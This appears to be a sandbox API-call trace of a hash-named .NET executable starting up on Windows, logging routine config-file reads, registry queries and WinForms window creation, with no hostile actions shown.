[0160.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea24 | out: lpFileInformation=0x28ea24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0160.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x28e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea2c | out: lpFileInformation=0x28ea2c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0160.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x28e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e964) returned 1
[0160.755] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1f0
[0160.755] GetFileType (hFile=0x1f0) returned 0x1
[0160.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e960) returned 1
[0160.756] GetFileType (hFile=0x1f0) returned 0x1
[0160.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x28dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x28dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28df44) returned 1
[0160.810] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x28e208 | out: lpFileInformation=0x28e208*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0160.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28df40) returned 1
[0160.935] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x28e0d4 | out: pfEnabled=0x28e0d4) returned 0x0
[0161.006] GetFileSize (in: hFile=0x1f0, lpFileSizeHigh=0x28ea20 | out: lpFileSizeHigh=0x28ea20*=0x0) returned 0x8c8e
[0161.008] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e9dc, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e9dc*=0x1000, lpOverlapped=0x0) returned 1
[0161.027] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e88c, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e88c*=0x1000, lpOverlapped=0x0) returned 1
[0161.029] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e740, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e740*=0x1000, lpOverlapped=0x0) returned 1
[0161.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e740, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e740*=0x1000, lpOverlapped=0x0) returned 1
[0161.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e740, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e740*=0x1000, lpOverlapped=0x0) returned 1
[0161.032] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e678, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e678*=0x1000, lpOverlapped=0x0) returned 1
[0161.039] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e7e4, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e7e4*=0x1000, lpOverlapped=0x0) returned 1
[0161.042] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e6d8, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e6d8*=0x1000, lpOverlapped=0x0) returned 1
[0161.042] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e6d8, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e6d8*=0xc8e, lpOverlapped=0x0) returned 1
[0161.043] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e79c, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e79c*=0x0, lpOverlapped=0x0) returned 1
[0161.043] CloseHandle (hObject=0x1f0) returned 1
[0161.044] CloseHandle (hObject=0x40) returned 1
[0161.044] GetCurrentProcess () returned 0xffffffff
[0161.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.046] CloseHandle (hObject=0x40) returned 1
[0161.046] GetCurrentProcess () returned 0xffffffff
[0161.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.047] CloseHandle (hObject=0x40) returned 1
[0161.054] GetCurrentProcess () returned 0xffffffff
[0161.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28ea2c | out: TokenHandle=0x28ea2c*=0x40) returned 1
[0161.055] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea24 | out: lpFileInformation=0x28ea24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0161.056] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x28e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0161.056] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea2c | out: lpFileInformation=0x28ea2c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0161.056] CloseHandle (hObject=0x40) returned 1
[0161.057] GetCurrentProcess () returned 0xffffffff
[0161.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.057] CloseHandle (hObject=0x40) returned 1
[0161.058] GetCurrentProcess () returned 0xffffffff
[0161.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.059] CloseHandle (hObject=0x40) returned 1
[0161.077] GetCurrentProcess () returned 0xffffffff
[0161.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e990 | out: TokenHandle=0x28e990*=0x40) returned 1
[0161.085] CloseHandle (hObject=0x40) returned 1
[0161.085] GetCurrentProcess () returned 0xffffffff
[0161.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e9a8 | out: TokenHandle=0x28e9a8*=0x40) returned 1
[0161.092] CloseHandle (hObject=0x40) returned 1
[0161.102] GetSystemMetrics (nIndex=75) returned 1
[0161.114] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0161.125] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000
[0161.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x28ec74, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15
[0161.130] GetProcAddress (hModule=0x752b0000, lpProcName="AddDllDirectory") returned 0x753d1e91
[0161.130] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x6eba0000
[0161.152] AdjustWindowRectEx (in: lpRect=0x28eddc, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x28eddc) returned 1
[0161.159] GetCurrentProcess () returned 0xffffffff
[0161.159] GetCurrentThread () returned 0xfffffffe
[0161.159] GetCurrentProcess () returned 0xffffffff
[0161.159] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x28ecf4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28ecf4*=0x1f0) returned 1
[0161.164] GetCurrentThreadId () returned 0x5c0
[0161.181] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76860000
[0161.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x28eb0c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWGm$\x1ez\\DþwqÌï(", lpUsedDefaultChar=0x0) returned 14
[0161.181] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcW") returned 0x76f325dd
[0161.182] GetStockObject (i=5) returned 0x1900015
[0161.188] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.191] CoTaskMemAlloc (cb=0x5a) returned 0x7293f8
[0161.191] RegisterClassW (lpWndClass=0x28eafc) returned 0xc12d
[0161.193] CoTaskMemFree (pv=0x7293f8)
[0161.193] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.194] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.1a0e24_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x80060
[0161.195] SetWindowLongW (hWnd=0x80060, nIndex=-4, dwNewLong=1995646429) returned 85788886
[0161.197] GetWindowLongW (hWnd=0x80060, nIndex=-4) returned 1995646429
[0161.206] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e410 | out: phkResult=0x28e410*=0x230) returned 0x0
[0161.207] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x28e430, lpData=0x0, lpcbData=0x28e42c*=0x0 | out: lpType=0x28e430*=0x0, lpData=0x0, lpcbData=0x28e42c*=0x0) returned 0x2
[0161.208] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x28e430, lpData=0x0, lpcbData=0x28e42c*=0x0 | out: lpType=0x28e430*=0x0, lpData=0x0, lpcbData=0x28e42c*=0x0) returned 0x2
[0161.208] RegCloseKey (hKey=0x230) returned 0x0
[0161.209] SetWindowLongW (hWnd=0x80060, nIndex=-4, dwNewLong=85788926) returned 1995646429
[0161.210] GetWindowLongW (hWnd=0x80060, nIndex=-4) returned 85788926
[0161.210] GetWindowLongW (hWnd=0x80060, nIndex=-16) returned 113311744
[0161.211] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc073
[0161.212] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x24, wParam=0x0, lParam=0x28e6e8) returned 0x0
[0161.212] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc076
[0161.213] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x81, wParam=0x0, lParam=0x28e6dc) returned 0x1
[0161.213] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x83, wParam=0x0, lParam=0x28e6c8) returned 0x0
[0161.213] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x1, wParam=0x0, lParam=0x28e6dc) returned 0x0
[0161.214] GetClientRect (in: hWnd=0x80060, lpRect=0x28e444 | out: lpRect=0x28e444) returned 1
[0161.214] GetWindowRect (in: hWnd=0x80060, lpRect=0x28e444 | out: lpRect=0x28e444) returned 1
[0161.216] GetParent (hWnd=0x80060) returned 0x0
[0161.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x28e850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0161.240] IsAppThemed () returned 0x1
[0161.241] CoTaskMemAlloc (cb=0xf0) returned 0x7636d8
[0161.241] CreateActCtxA (pActCtx=0x28ed74) returned 0x765c7c
[0161.247] CoTaskMemFree (pv=0x7636d8)
[0161.249] GetCurrentActCtx (in: lphActCtx=0x28f1e0 | out: lphActCtx=0x28f1e0*=0x0) returned 1
[0161.249] ActivateActCtx (in: hActCtx=0x765c7c, lpCookie=0x28f1f0 | out: hActCtx=0x765c7c, lpCookie=0x28f1f0) returned 1
[0161.250] GetCurrentActCtx (in: lphActCtx=0x28f000 | out: lphActCtx=0x28f000*=0x765c7c) returned 1
[0161.250] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.250] CreateWindowExW (dwExStyle=0x10000, lpClassName="WindowsForms10.Window.8.app.0.1a0e24_r14_ad1", lpWindowName=0x0, dwStyle=0x22cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x7005c
[0161.252] SetWindowLongW (hWnd=0x7005c, nIndex=-4, dwNewLong=1995646429) returned 85788886
[0161.252] GetWindowLongW (hWnd=0x7005c, nIndex=-4) returned 1995646429
[0161.252] SetWindowLongW (hWnd=0x7005c, nIndex=-4, dwNewLong=85788966) returned 1995646429
[0161.252] GetWindowLongW (hWnd=0x7005c, nIndex=-4) returned 85788966
[0161.252] GetWindowLongW (hWnd=0x7005c, nIndex=-16) returned 651100160
[0161.252] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x81, wParam=0x0, lParam=0x28ea88) returned 0x1
[0161.255] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x0, lParam=0x28ea74) returned 0x0
[0161.554] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x1, wParam=0x0, lParam=0x28ea88) returned 0x0
[0161.554] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e7c0 | out: lpRect=0x28e7c0) returned 1
[0161.554] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e7c0 | out: lpRect=0x28e7c0) returned 1
[0161.555] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.555] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.555] GetSystemMetrics (nIndex=42) returned 0
[0161.556] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28e638, nMaxCount=1 | out: lpString="") returned 0
[0161.556] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28e638) returned 0x0
[0161.568] GetProcessWindowStation () returned 0x60
[0161.569] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x288dfa0, nLength=0xc, lpnLengthNeeded=0x28e6b8 | out: pvInfo=0x288dfa0, lpnLengthNeeded=0x28e6b8) returned 1
[0161.572] SetConsoleCtrlHandler (HandlerRoutine=0x51d094e, Add=1) returned 1
[0161.573] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.573] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.576] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1a0e24.0", lpWndClass=0x288e010 | out: lpWndClass=0x288e010) returned 0
[0161.579] CoTaskMemAlloc (cb=0x56) returned 0x702b78
[0161.579] RegisterClassW (lpWndClass=0x28e608) returned 0xc1d0
[0161.579] CoTaskMemFree (pv=0x702b78)
[0161.581] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1a0e24.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.1a0e24.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x50254
[0161.581] NtdllDefWindowProc_W () returned 0x1
[0161.581] NtdllDefWindowProc_W () returned 0x0
[0161.581] NtdllDefWindowProc_W () returned 0x0
[0161.582] NtdllDefWindowProc_W () returned 0x0
[0161.582] NtdllDefWindowProc_W () returned 0x0
[0161.587] GetStartupInfoW (in: lpStartupInfo=0x288e440 | out: lpStartupInfo=0x288e440*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0161.588] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28ea9c) returned 0x0
[0161.589] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x1, lParam=0x28ea74) returned 0x0
[0161.592] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28e84c | out: lpwndpl=0x28e84c) returned 1
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28ea9c) returned 0x0
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0161.592] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e360 | out: lpRect=0x28e360) returned 1
[0161.592] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e360 | out: lpRect=0x28e360) returned 1
[0161.592] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.592] GetSystemMetrics (nIndex=42) returned 0
[0161.592] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28e1d8, nMaxCount=1 | out: lpString="") returned 0
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28e1d8) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0161.593] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e7fc | out: lpRect=0x28e7fc) returned 1
[0161.593] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e7fc | out: lpRect=0x28e7fc) returned 1
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc5e0) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0
[0161.595] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x1, lParam=0x28e680) returned 0x0
[0161.596] GetParent (hWnd=0x7005c) returned 0x0
[0161.602] GetStockObject (i=5) returned 0x1900015
[0161.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.603] CoTaskMemAlloc (cb=0x5a) returned 0x7293f8
[0161.603] RegisterClassW (lpWndClass=0x28eed0) returned 0xc1d1
[0161.603] CoTaskMemFree (pv=0x7293f8)
[0161.603] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.603] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.1a0e24_r14_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x501fe
[0161.603] SetWindowLongW (hWnd=0x501fe, nIndex=-4, dwNewLong=1995646429) returned 85789086
[0161.604] GetWindowLongW (hWnd=0x501fe, nIndex=-4) returned 1995646429
[0161.604] SetWindowLongW (hWnd=0x501fe, nIndex=-4, dwNewLong=85789126) returned 1995646429
[0161.604] GetWindowLongW (hWnd=0x501fe, nIndex=-4) returned 85789126
[0161.604] GetWindowLongW (hWnd=0x501fe, nIndex=-16) returned 79691776
[0161.605] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x24, wParam=0x0, lParam=0x28eabc) returned 0x0
[0161.605] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x81, wParam=0x0, lParam=0x28eab0) returned 0x1
[0161.605] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x83, wParam=0x0, lParam=0x28ea9c) returned 0x0
[0161.606] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x1, wParam=0x0, lParam=0x28eab0) returned 0x0
[0161.606] SetWindowLongW (hWnd=0x7005c, nIndex=-8, dwNewLong=328190) returned 0
[0161.620] GetSystemMetrics (nIndex=11) returned 32
[0161.620] GetSystemMetrics (nIndex=12) returned 32
[0161.621] GetDC (hWnd=0x0) returned 0x12010184
[0161.625] GetDeviceCaps (hdc=0x12010184, index=12) returned 32
[0161.625] GetDeviceCaps (hdc=0x12010184, index=14) returned 1
[0161.626] ReleaseDC (hWnd=0x0, hDC=0x12010184) returned 1
[0161.627] CreateIconFromResourceEx (presbits=0x2891468, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0xb00d9
[0161.629] GetSystemMetrics (nIndex=49) returned 16
[0161.629] GetSystemMetrics (nIndex=50) returned 16
[0161.629] CreateIconFromResourceEx (presbits=0x2892558, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x502a9
[0161.631] SendMessageW (hWnd=0x7005c, Msg=0x80, wParam=0x0, lParam=0x502a9) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x80, wParam=0x0, lParam=0x502a9) returned 0x0
[0161.631] SendMessageW (hWnd=0x7005c, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc5e0) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x502a9
[0161.633] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.634] GetSystemMenu (hWnd=0x7005c, bRevert=0) returned 0x402a7
[0161.694] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28f010 | out: lpwndpl=0x28f010) returned 1
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf020, uEnable=0x1) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf000, uEnable=0x1) returned 0
[0161.694] SetWindowLongW (hWnd=0x7005c, nIndex=-8, dwNewLong=328190) returned 328190
[0161.695] SendMessageW (hWnd=0x501fe, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
